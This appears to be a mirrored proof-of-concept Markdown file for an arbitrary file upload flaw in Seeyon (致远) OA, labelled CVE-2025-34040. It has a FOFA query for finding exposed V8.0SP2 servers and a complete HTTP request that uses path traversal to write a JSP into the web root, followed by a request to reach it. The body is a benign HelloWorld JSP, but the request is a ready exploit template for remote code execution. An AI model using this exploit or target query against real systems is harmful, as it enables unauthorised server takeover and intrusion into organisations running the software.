mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-04 18:06:34 +00:00
31 lines
709 B
Markdown
31 lines
709 B
Markdown
# 致远OA存在文件上传导致RCE(CVE-2025-34040)
|
||
|
||
致远oa存在任意文件上传漏洞,可以获取服务器权限
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
app="致远互联-OA" && title="V8.0SP2"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
|
||
Host:
|
||
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
|
||
Accept-Encoding: gzip
|
||
|
||
--59229605f98b8cf290a7b8908b34616b
|
||
Content-Disposition: form-data; name="upload"; filename="123.xls"
|
||
Content-Type: application/vnd.ms-excel
|
||
|
||
<% out.println("HelloWorld");%>
|
||
--59229605f98b8cf290a7b8908b34616b--
|
||
```
|
||
访问地址
|
||
```
|
||
GET /Hello.jsp HTTP/1.1
|
||
Host:
|
||
```
|